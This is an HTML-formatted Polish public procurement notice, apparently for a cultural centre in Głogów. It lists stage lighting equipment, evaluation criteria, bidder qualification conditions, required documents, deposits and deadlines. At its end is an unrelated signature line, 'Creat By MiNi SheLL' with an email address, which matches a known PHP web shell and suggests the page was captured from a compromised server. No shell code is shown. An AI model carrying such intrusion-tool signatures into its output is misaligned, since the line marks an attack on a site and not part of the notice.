<br/>urządzenia oświetleniowe<br/><br/>5.1 Sunstrip Active MKII 10x50W z żarówkami, przewodem Powercon oraz dodatkowym zestawem montażowym o kodzie 30713 – 12 sztuk<br/>5.2. dedykowany, wzmacniany case transportowy na 12 sztuk sunstrip active mk2.<br/>5.3. naświetlacz architektoniczny – 8 sztuki<br/>5.4. dedykowany, wzmacniany case transportowy na 4 sztuk naświetlaczy architektonicznych.<br/>wytrzymała, wzmacniana skrzynia transportowa na wzmacnianych kołach, <br/>po bokach po 2 uchwyty do przenoszenia.<br/>5.5. stroboskop efektowy RGBW z funkcją ruchu TILT - 8 sztuk,<br/>5.6 skrzynia trasnportowa na stroboskop efektowy z funkcją tilt 1 szt<br/>5.7. oświetlenie typu WASH b-eye – 10 sztuk<br/>WASH &amp; PIXEL SHAPES<br/>5.8. skrzynia transportowa na 2 sztuki wash b-eye - 5 sztuk<br/>5.9. głowa ruchoma spot/beam LED – 8 sztuk<br/>5.10. skrzynia transportowa na 2 sztuki głowa spot/beam 4 sztuki<br/>dedykowany, wzmacniany case transportowy na 2 sztuki głowy spot/beam<br/>wytrzymała, wzmacniana skrzynia transportowa na wzmacnianych kołach, <br/>po bokach po 2 uchwyty do przenoszenia.<br/>5.11. reflektor pofilowy, ze zmotoryzowanym zoomem, 200W RGBW, 8 sztuk<br/>(4 sztuki zom 15-25, 4 sztuki zoom 25-50)<br/>LED PROFILE 200 RGBW to wysokiej klasy oświetlacz profilowy wyposażony w źródło światła LED RGBW o mocy 200 W, występujący w dwóch wariantach zakresu regulacji kąta świecenia: 15°-28° i 20°-45°.<br/>5.12. Wytwornica dymu typu hazer 2 sztuki<br/>5.l3. głowa profilowa LED ze zmotoryzowanymi nożami kadrującymi, z chłodzeniem aktywnym, zmienne CRI od 70 do 90. 4 sztuki<br/>5.14 skrzynia transportowa na 2 sztuki głowa profilowa LED, z nożami kadrującymi<br/>5.15. głowa efektowa typu wash, 3 ringi, niezależna kontrola każdego ringu. <br/>Zamiennik robe 600wash. 8 sztuk<br/>5.16 skrzynia transportowa na 2 sztuki głowa profilowa LED, z nożami kadrującymi<br/>5.17 reflektor teatralny typu PC LED RGBWA+Uv 300W<br/><br/><br/>Szczegółowy opis i zakres wykonania ww. zakresu zawiera „Szczegółowy opis przedmiotu zamówienia – dostawa sprzętu MOK” - stanowiący załącznik nr 11c do niniejszej SWZ. Do formularza ofertowego – załącznik nr 1 do niniejszej SWZ Wykonawca dołączy załącznik nr 11d – wykaz sprzętu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32342400-6 - Sprzęt nagłaśniający</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">27.	Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8<br/>do wysokości po 50 % wartości zamówienia podstawowego dla części I i części II oraz 25% dla części III. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w dokumentacji i/lub ujętych w wykazie dostaw.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rozwiązania technologiczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/><br/>Część I i Część II<br/><br/>1) sytuacji ekonomicznej i finansowej; <br/>a) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 1.000.000,00 zł (słownie: jeden milion złotych 00/100): co potwierdzą poprzez złożenie aktualnej informacji banku,<br/>b) posiadają ubezpieczenie od OC z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę co najmniej 1.500.000,00 zł (słownie: jeden milion pięćset tysięcy złotych 00/100).<br/>UWAGA:<br/>Do każdej części zamówienia należy wykazać środki finansowe lub zdolność kredytową oraz ubezpieczenie od OC odpowiadającą odpowiednio ilości części na którą Wykonawca składa ofertę.<br/><br/><br/>2) zdolności technicznej lub zawodowej, tj. <br/><br/>a) posiadają doświadczenie umożliwiające realizację zamówienia tzn. <br/> - w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej 1 robotę budowlaną polegającą na wykonaniu budowy/przebudowy/rozbudowy/remontu /modernizacji budynku użyteczności publicznej lub budynku zamieszkania zbiorowego o pow. użytkowej min. 500 m2, <br/><br/>co potwierdzą w wykazie wykonanych robót i usług oraz referencjami;<br/><br/>UWAGA<br/>Wykonawca może okazać się jednymi referencjami na obie części<br/><br/><br/>b) dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj:<br/><br/> W zakresie osób wchodzących w skład Zespołu projektowego Wykonawca winien dysponować następującymi osobami:<br/><br/>- projektant, będący jednocześnie koordynatorem zespołu wykonującego dokumentację projektową, z uprawnieniami do projektowania w specjalności architektonicznej bez ograniczeń z min. 3 letnią praktyką zawodową, liczoną od dnia uzyskania uprawnień zawodowych,<br/><br/>- projektant z uprawnieniami do projektowania w specjalności konstrukcyjnej bez ograniczeń z min. 3 letnią praktyką zawodową, liczoną od dnia uzyskania uprawnień zawodowych oraz posiadający doświadczenie w zaprojektowaniu co najmniej jednego obiektu, na realizację którego uzyskano decyzję pozwolenia na budowę,<br/><br/>- projektant z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych z min. 3 letnią praktyką zawodową, , liczoną od dnia uzyskania uprawnień zawodowych,<br/><br/>- projektant z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych z min. 3 letnią praktyką zawodową, liczoną od dnia uzyskania uprawnień zawodowych,<br/><br/>- projektant z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń telekomunikacyjnych z min. 3 letnią praktyką zawodową, liczoną od dnia uzyskania uprawnień zawodowych.<br/>Wykonawca winien także dysponować osobami sprawdzającymi poszczególne branże.<br/><br/>Uprawnienia kierownik budowy i kierownicy robót:<br/><br/>- Kierownik budowy z uprawnieniami do kierowania robotami budowlanymi specjalności konstrukcyjno-budowlanej bez ograniczeń, bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika dla budowy będącej przedmiotem zamówienia oraz co najmniej 5 letnie doświadczenie w kierowaniu budową w zakresie robót konstrukcyjno-budowlanych,<br/><br/>- Kierownik robót z uprawnieniami do kierowania robotami budowlanymi specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych wentylacyjnych, gazowych i wodociągowych i Kanalizacyjnych bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót sanitarnych,<br/><br/>- Kierownik robót z uprawnieniami do kierowania robotami budowlanymi specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót elektrycznych,<br/><br/>- Kierownik robót z uprawnieniami do kierowania robotami budowlanymi specjalności instalacyjnej w zakresie sieci instalacji i urządzeń telekomunikacyjnych, bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót teletechnicznych,<br/><br/> - osobą posiadającą zaświadczenie w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach nieruchomych (przedmiotowe zamówienie znajduje się w strefie objętej ochroną konserwatorską) lub brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury, przez co najmniej 18 miesięcy (dotyczy Części II),<br/><br/>co potwierdzą w wykazie osób zdolnych do realizacji zamówienia.<br/><br/><br/>Część III:<br/><br/>1) sytuacji ekonomicznej i finansowej; <br/>a) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej <br/>300.000,00 zł (słownie: trzysta tysięcy złotych 00/100) co potwierdzą poprzez złożenie aktualnej informacji banku,<br/>b) posiadają ubezpieczenie od OC z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę co najmniej 500.000,00 zł (słownie: pięćset tysięcy złotych 00/100). <br/>2)	zdolności technicznej lub zawodowej, tj. posiadają doświadczenie umożliwiające realizację zamówienia tzn. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie dostawę urządzeń oświetleniowych i/lub nagłośnieniowych (mogą być dostawy oddzielne lub łączone) na łączną kwotę co najmniej 200.000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dla Części I i Części II<br/><br/>1.	Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego (zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1)	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b)	oświadczenia o braku przynależności do grupy kapitałowej (wg załącznika Nr 3 do SWZ).<br/>c)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ustawy Prawo zamówień publicznych (wzór stanowi załącznik Nr 8 do SWZ ).<br/>Część III<br/>1. Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego (zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1) W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału <br/>w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/> a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenia o braku przynależności do grupy kapitałowej ( wg załącznika Nr 3 do SWZ). Zamawiający żąda od wykonawcy, który na potwierdzenie spełniania warunków udziału w postępowaniu, polega na zdolnościach lub sytuacji innych podmiotów, przedstawienia <br/>w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 1 ppkt 1 lit. a) i b).<br/>c) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu , <br/>o którym mowa w art.125 ustawy Prawo zamówień publicznych (wzór stanowi załącznik Nr 8do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>dla części I i II<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz <br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wg załącznika Nr 4 do SWZ),<br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ( wg załącznika Nr 5 ),<br/>c) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>d)	dokument potwierdzający, że wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej ubezpieczenia,<br/>dla części III<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału <br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej, sytuacji finansowej, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>a) wykazu dostaw zrealizowanych w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy w tym okresie, z podaniem rodzaju, wartości i daty oraz miejsca wykonywania (wg załącznika nr 4 do SWZ) <br/>c) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, <br/>w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>d) dokument potwierdzający, że wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej ubezpieczenia.<br/>1.1 Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>1.2 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu <br/>z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane wraz z ofertą.<br/>1) Formularz ofertowy<br/> 2)	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału <br/>w postępowaniu w zakresie wskazanym w rozdziale VI i VII SWZ<br/>3) Pełnomocnictwo <br/>4) Zobowiązanie podmiotu <br/>5) Wadium <br/>6) Zastrzeżenie tajemnicy przedsiębiorstwa <br/>7)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: <br/>Część I 30.000,00 zł (słownie: trzydzieści tysięcy złotych 00/100)<br/>Część II 15.000,00 zł (słownie: piętnaście tysięcy złotych 00/100) <br/>Część III 8.000,00 zł (słownie: osiem tysięcy złotych 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:<br/>a. wspólnie spełniają warunki udziału w postępowaniu,<br/>b. w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia<br/>z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.,<br/>c. ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>d. muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>e. przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę<br/>tych wykonawców,<br/>f. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy (wzór stanowi załącznik Nr 9 do SWZ),<br/>g. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> warunki zmian określone zostały w dokumentach zamówienia SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-29 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie realizowane w ramach programu - Rządowy Fundusz Polski Ład:<br/>Program Inwestycji Strategicznych<br/>Zamawiający uzyskał w ramach ww. Programu wstępną promesę na dofinansowanie. /Załącznik nr 12/ wstępna promesa nr Edycja8/2023/4783/PolskiLad<br/>Termin wykonania zamówienia<br/>Część I <br/>Wykonanie całego przedmiotu zamówienia – w terminie do 420 dni kalendarzowych licząc od dnia zawarcia umowy lecz nie później niż do dnia 10.12.2025 r. wraz z uzyskaniem ostatecznej decyzji pozwolenia na użytkowanie/ skutecznego zawiadomienia/zgłoszenia zakończenia robót/budowy dla całego zamierzenia inwestycyjnego z zastrzeżeniem, że wykonanie kompletnej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem prawomocnych decyzji administracyjnych umożliwiających realizację przedmiotu zamówienia (pozwolenie na budowę) Wykonawca przekaże w terminie do 180 dni kalendarzowych od daty zawarcia umowy.<br/> Część II<br/>Wykonanie całego przedmiotu zamówienia – w terminie 420 dni kalendarzowych licząc od dnia zawarcia umowy lecz nie później niż do dnia 10.12.2025 r. wraz z uzyskaniem ostatecznej decyzji pozwolenia na użytkowanie/ skutecznego zawiadomienia/zgłoszenia zakończenia robót/budowy dla całego zamierzenia inwestycyjnego z zastrzeżeniem, że wykonanie kompletnej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem prawomocnych decyzji administracyjnych umożliwiających realizację przedmiotu zamówienia (pozwolenie na budowę) Wykonawca przekaże w terminie do 180 dni kalendarzowych od daty zawarcia umowy.<br/>Dla Części I i Części II <br/>Przez skuteczne zawiadomienie/zgłoszenie zakończenia robót/budowy rozumie się, że organ nadzoru budowlanego przyjął zgłoszenie/zawiadomienie o zakończeniu robót/ budowy bez uwag dla całego zamierzenia inwestycyjnego (dopuszcza się w uzasadnionych przypadkach tzw. milczącą zgodę – po upływie określonego w przepisach terminu), w terminie wyznaczonym na zrealizowanie całego przedmiotu zamówienia. <br/>Część III<br/>Wykonanie całego przedmiotu zamówienia w terminie do 180 dni kalendarzowych od dnia zawarcia umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com